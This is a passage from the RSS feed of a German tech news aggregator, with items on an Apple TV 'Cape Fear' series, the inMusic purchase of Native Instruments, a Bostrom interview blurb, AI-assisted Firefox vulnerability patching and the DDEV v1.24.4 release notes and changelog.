<pubDate>Fri, 08 May 2026 18:12:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple TV has unveiled the trailer for “Cape Fear,” the new psychological horror thriller showrun and executive produced by Nick Antosca…</p>
<p>The post <a href="https://macdailynews.com/2026/05/08/apple-tv-releases-trailer-for-cape-fear-limited-series-starring-amy-adams-javier-bardem-and-patrick-wilson/">Apple TV releases trailer for ‘Cape Fear’ limited series starring Amy Adams, Javier Bardem, and Patrick Wilson</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The company that owns Moog, Akai Pro, and Numark is buying Native Instruments]]></title>
<description><![CDATA[Native Instruments' suite of music production software and gear, including Traktor and Kontakt, will soon live under the inMusic umbrella alongside other music tech brands like Akai Professional and Moog Music. As MusicRadar reports, Native Instruments CEO Nick Williams said the company was looki...]]></description>
<link>https://tsecurity.de/de/3499732/it-nachrichten/the-company-that-owns-moog-akai-pro-and-numark-is-buying-native-instruments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499732/it-nachrichten/the-company-that-owns-moog-akai-pro-and-numark-is-buying-native-instruments/</guid>
<pubDate>Fri, 08 May 2026 17:33:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Native Instruments' suite of music production software and gear, including Traktor and Kontakt, will soon live under the inMusic umbrella alongside other music tech brands like Akai Professional and Moog Music. As MusicRadar reports, Native Instruments CEO Nick Williams said the company was looking for a buyer in March, following news it had entered bankruptcy […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Nick Bostrom Has a Plan for Humanity’s ‘Big Retirement’]]></title>
<description><![CDATA[The philosopher thinks humans should pursue advanced AI and the promise of a “solved world.”]]></description>
<link>https://tsecurity.de/de/3499657/ai-nachrichten/nick-bostrom-has-a-plan-for-humanitys-big-retirement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499657/ai-nachrichten/nick-bostrom-has-a-plan-for-humanitys-big-retirement/</guid>
<pubDate>Fri, 08 May 2026 17:07:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The philosopher thinks humans should pursue advanced AI and the promise of a “solved world.”]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Unveils The Thrilling Trailer For New Cape Fear Series]]></title>
<description><![CDATA[Apple TV just released the first look at its upcoming psychological horror thriller, Cape Fear. The highly anticipated limited series features a star-studded cast and brings back a classic tale of revenge. With huge names attached behind the scenes, the network is setting the stage for a tense su...]]></description>
<link>https://tsecurity.de/de/3499127/ios-mac-os/apple-tv-unveils-the-thrilling-trailer-for-new-cape-fear-series/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499127/ios-mac-os/apple-tv-unveils-the-thrilling-trailer-for-new-cape-fear-series/</guid>
<pubDate>Fri, 08 May 2026 13:42:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV just released the first look at its upcoming psychological horror thriller, Cape Fear. The highly anticipated limited series features a star-studded cast and brings back a classic tale of revenge. With huge names attached behind the scenes, the network is setting the stage for a tense summer watch. If you are looking for a dark story, here is everything you need to know about the upcoming show.



The classic revenge story returns with a famous cast



The plot stays true to the chilling roots of the original books and movies. Inspired by the 1991 remake directed by Martin Scorsese and produced by Steven Spielberg, a storm is coming for happily married attorneys Anna (Amy Adams) and Tom Bowden (Patrick Wilson) when Max Cady (Javier Bardem), the notorious killer they are responsible for putting behind bars, is let out of prison, and he wants vengeance.



Showrunner Nick Antosca brings the story to life alongside executive producers Scorsese and Spielberg. The supporting cast includes familiar faces like CCH Pounder, Jamie Hector, and Anna Baryshnikov. Fans of the thriller genre can expect a fresh take on the tension that made the previous film versions so popular.




https://www.youtube.com/watch?v=FZ3sN5E-mBU




Keep track of the summer streaming schedule and dates



Apple TV plans to roll out the show during the hot summer months. You can start watching the drama unfold early in June.



Here are the key details for the release:




Episodes: 10



Genre: Psychological Horror Thriller



Starts Airing: Friday, June 5, 2026



Finale Date: July 31, 2026



Release Schedule: First two episodes on premiere day, followed by one new episode every Friday




The platform continues to build its library of premium dramas. This new addition aims to keep viewers guessing each week. With a slow release structure, it gives fans time to discuss the mystery as it develops over the two months.



The combination of Academy Award winners and a proven story formula makes Cape Fear a must-watch event. If you enjoy intense thrillers, this series should be on your watch list.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Patches 423 Vulnerabilities, Adds Support for Claude Mythos and Other AI Models]]></title>
<description><![CDATA[Mozilla recently disclosed the remediation of an unprecedented number of latent security flaws in Firefox. By leveraging advanced artificial intelligence models, including Claude Mythos Preview, security engineers successfully identified and patched 423 vulnerabilities. This massive cleanup marks...]]></description>
<link>https://tsecurity.de/de/3498432/it-security-nachrichten/firefox-patches-423-vulnerabilities-adds-support-for-claude-mythos-and-other-ai-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3498432/it-security-nachrichten/firefox-patches-423-vulnerabilities-adds-support-for-claude-mythos-and-other-ai-models/</guid>
<pubDate>Fri, 08 May 2026 09:54:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Mozilla recently disclosed the remediation of an unprecedented number of latent security flaws in Firefox. By leveraging advanced artificial intelligence models, including Claude Mythos Preview, security engineers successfully identified and patched 423 vulnerabilities. This massive cleanup marks a significant shift in how open-source projects handle threat discovery, moving from traditional fuzzing to automated, AI-driven pipelines. […]</p>
<p>The post <a href="https://cyberpress.org/firefox-patches-423-vulnerabilities/">Firefox Patches 423 Vulnerabilities, Adds Support for Claude Mythos and Other AI Models</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.24.4: XHGui for XHProf Profiling]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux or WSL2: Use apt install ddev or apt upgrade ddev see apt/yum installation
Traditional Windows: Use choco upgrade -y ddev, or download the ddev_windows_i...]]></description>
<link>https://tsecurity.de/de/3497304/downloads/v1244-xhgui-for-xhprof-profiling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3497304/downloads/v1244-xhgui-for-xhprof-profiling/</guid>
<pubDate>Thu, 07 May 2026 22:17:30 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux or WSL2: Use <code>apt install ddev</code> or <code>apt upgrade ddev</code> see <a href="https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Traditional Windows: Use <code>choco upgrade -y ddev</code>, or download the ddev_windows_installer below.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights:</h2>
<ul>
<li><a href="https://typo3.org/article/four-ideas-to-be-funded-in-quarter-1-2025" rel="nofollow">Sponsored by the TYPO3 Community</a>: Integrate XHGui into DDEV, enable it with <code>ddev poweroff &amp;&amp; ddev config global --xhprof-mode=xhgui</code>, then use <code>ddev xhgui</code> in any of your projects.</li>
<li><a href="https://marketplace.visualstudio.com/items?itemName=damms005.devdb" rel="nofollow">DevDb VS Code extension</a>: First class support for DDEV, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damms005/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damms005">@damms005</a></li>
</ul>
<h2>Features:</h2>
<ul>
<li>Optional <a href="https://docs.docker.com/compose/how-tos/profiles/" rel="nofollow">Docker Compose profiles</a>: You can now start projects with specific profiles using <code>ddev start --profiles=list,of,profiles</code></li>
<li>Backdrop: a new quickstart based on the official add-on, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a></li>
<li>New <a href="https://ddev.readthedocs.io/en/stable/users/extend/custom-commands/#mutagensync-annotation" rel="nofollow"><code>MutagenSync</code> annotation</a>: Custom commands that alter the host system can now use this annotation to help synchronize changes.</li>
</ul>
<h2>Bug Fixes:</h2>
<ul>
<li>DDEV router now works properly behind proxies (regression from v1.24.0).</li>
<li>Show router URLs in <code>ddev describe</code> and <code>ddev list</code> when default 80/443 port is busy (regression from v1.24.3).</li>
<li>Correct status color formatting in <code>ddev describe</code> and <code>ddev list</code>.</li>
<li>Remove outdated Traefik images with <code>ddev delete images</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Resolve misleading errors in <code>ddev debug test</code> when run outside the project root.</li>
<li>Fix invalid <code>upload_dirs</code> on traditional Windows setups.</li>
<li>Sanitize <code>~/.ddev/project_list.yaml</code> to prevent panic.</li>
<li>Make the <code>DDEV_PAGER</code> environment variable optional to prevent it from breaking <code>wp-cli</code> output.</li>
<li>Prevent overwriting the <code>generic</code> project type when running <code>ddev config --update</code>.</li>
<li>Update <code>DATABASE_URL</code> to use <code>charset=utf8mb4</code> in MySQL and MariaDB for Symfony projects, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RubenColpaert/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RubenColpaert">@RubenColpaert</a></li>
<li>Delete third-party built images on <code>ddev delete</code>.</li>
</ul>
<h2>Minor Updates:</h2>
<ul>
<li>PHP 8.3.19 and 8.4.5</li>
<li>Fix displaying for <code>#ddev-description</code> stanza in add-on install actions, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a></li>
<li>Show custom <code>config.*.yaml</code> on <code>ddev start</code>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a></li>
<li>Laravel 12 quickstart with tests.</li>
<li>Update DDEV brand logos for dark theme.</li>
<li>Update all Go vendor dependencies.</li>
<li>Add quickstart tests for Magento 2, CakePHP, ExpressionEngine, Kirby CMS, Symfony, Silverstripe CMS, CraftCMS, and Statamic, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Add OpenMage/Magento 1 quickstart test and split it from Magento 2, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sreichel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sreichel">@sreichel</a></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix: the <code>#ddev-description</code> stanza in add-on install actions not showing if it's the first line by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanoii/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanoii">@hanoii</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881505677" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7022" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7022/hovercard" href="https://github.com/ddev/ddev/pull/7022">#7022</a></li>
<li>feat: add <code>go-version</code> to <code>ddev version</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881488018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7021" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7021/hovercard" href="https://github.com/ddev/ddev/issues/7021">#7021</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2881994383" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7023" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7023/hovercard" href="https://github.com/ddev/ddev/pull/7023">#7023</a></li>
<li>feat: Add live link to Discord by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyler36/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyler36">@tyler36</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2890119688" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7042" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7042/hovercard" href="https://github.com/ddev/ddev/pull/7042">#7042</a></li>
<li>docs: remove the recommendation not to use colima by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883038685" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7025" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7025/hovercard" href="https://github.com/ddev/ddev/pull/7025">#7025</a></li>
<li>build: fix new mkdocs failure on git by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2895573083" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7046" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7046/hovercard" href="https://github.com/ddev/ddev/pull/7046">#7046</a></li>
<li>refactor: use <code>ddev composer create-project</code> in the code, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2800339972" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6920" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6920/hovercard" href="https://github.com/ddev/ddev/issues/6920">#6920</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883058777" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7027" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7027/hovercard" href="https://github.com/ddev/ddev/pull/7027">#7027</a></li>
<li>feat: Laravel 12 quickstart with tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2884083942" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7028" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7028/hovercard" href="https://github.com/ddev/ddev/pull/7028">#7028</a></li>
<li>fix: delete traefik images based on the pattern used for ddev-dbserver and use constants for targeting, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2362011554" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6326/hovercard" href="https://github.com/ddev/ddev/issues/6326">#6326</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2887734688" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7036" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7036/hovercard" href="https://github.com/ddev/ddev/pull/7036">#7036</a></li>
<li>feat: Support docker compose optional profiles, allow <code>ddev start --profiles=list,of,profiles</code>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2784687344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6894" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6894/hovercard" href="https://github.com/ddev/ddev/issues/6894">#6894</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2863727333" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7007" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7007/hovercard" href="https://github.com/ddev/ddev/pull/7007">#7007</a></li>
<li>fix: explicitly ping 127.0.0.1 in Traefik healthcheck to make proxying work, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2892968812" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7044" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7044/hovercard" href="https://github.com/ddev/ddev/issues/7044">#7044</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2804738825" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6931" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6931/hovercard" href="https://github.com/ddev/ddev/issues/6931">#6931</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2893855425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7045" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7045/hovercard" href="https://github.com/ddev/ddev/pull/7045">#7045</a></li>
<li>fix: remove refreshenv from WSL2 install scripts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2882448438" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7024" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7024/hovercard" href="https://github.com/ddev/ddev/issues/7024">#7024</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2883049861" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7026" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7026/hovercard" href="https://github.com/ddev/ddev/pull/7026">#7026</a></li>
<li>docs: add Backdrop-specific config considerations. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laryn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laryn">@laryn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2888045401" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7037" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7037/hovercard" href="https://github.com/ddev/ddev/pull/7037">#7037</a></li>
<li>build: don't use go 1.24 yet until docker issues resolved, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900544655" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7051" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7051/hovercard" href="https://github.com/ddev/ddev/issues/7051">#7051</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901680865" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7057" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7057/hovercard" href="https://github.com/ddev/ddev/pull/7057">#7057</a></li>
<li>test: Run quickstart tests with mutagen enabled [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2876193317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7017" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7017/hovercard" href="https://github.com/ddev/ddev/pull/7017">#7017</a></li>
<li>docs: Improve troubleshooting docs for hosting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901596832" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7056" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7056/hovercard" href="https://github.com/ddev/ddev/pull/7056">#7056</a></li>
<li>build: skip testing with buildkite if diff is not from that branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2910419890" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7064" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7064/hovercard" href="https://github.com/ddev/ddev/pull/7064">#7064</a></li>
<li>docs: update mkdocs logo, update word/figurative mark svg for dark mode by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2901286445" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7055" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7055/hovercard" href="https://github.com/ddev/ddev/pull/7055">#7055</a></li>
<li>build: put both git and ssh in both webserver images, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2900929934" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7054" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7054/hovercard" href="https://github.com/ddev/ddev/issues/7054">#7054</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2908485234" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7063" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7063/hovercard" href="https://github.com/ddev/ddev/pull/7063">#7063</a></li>
<li>build: Use specific binfmt for qemu in push-tagged-image [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2914447280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7070" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7070/hovercard" href="https://github.com/ddev/ddev/pull/7070">#7070</a></li>
<li>build: use special qemu binfmt version for db push [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915179691" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7073" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7073/hovercard" href="https://github.com/ddev/ddev/pull/7073">#7073</a></li>
<li>fix: add check for app in <code>ddev debug test</code> and run it from approot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915048403" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7072" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7072/hovercard" href="https://github.com/ddev/ddev/pull/7072">#7072</a></li>
<li>build: Update go mod files except docker, replaces <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2915548957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7074" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7074/hovercard" href="https://github.com/ddev/ddev/pull/7074">#7074</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918653984" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7078/hovercard" href="https://github.com/ddev/ddev/pull/7078">#7078</a></li>
<li>test: don't load 1password secrets if not available [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920352693" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7088" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7088/hovercard" href="https://github.com/ddev/ddev/pull/7088">#7088</a></li>
<li>test: Fix secret loading [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2920995846" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7090" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7090/hovercard" href="https://github.com/ddev/ddev/pull/7090">#7090</a></li>
<li>build: upgrade docker/docker to v28 usages, followup to <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918653984" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7078" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7078/hovercard" href="https://github.com/ddev/ddev/pull/7078">#7078</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918656767" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7079" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7079/hovercard" href="https://github.com/ddev/ddev/issues/7079">#7079</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2918727491" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7081" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7081/hovercard" href="https://github.com/ddev/ddev/pull/7081">#7081</a></li>
<li>docs: Fix pull request title link in pull request template [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2923104508" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7097" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7097/hovercard" href="https://github.com/ddev/ddev/pull/7097">#7097</a></li>
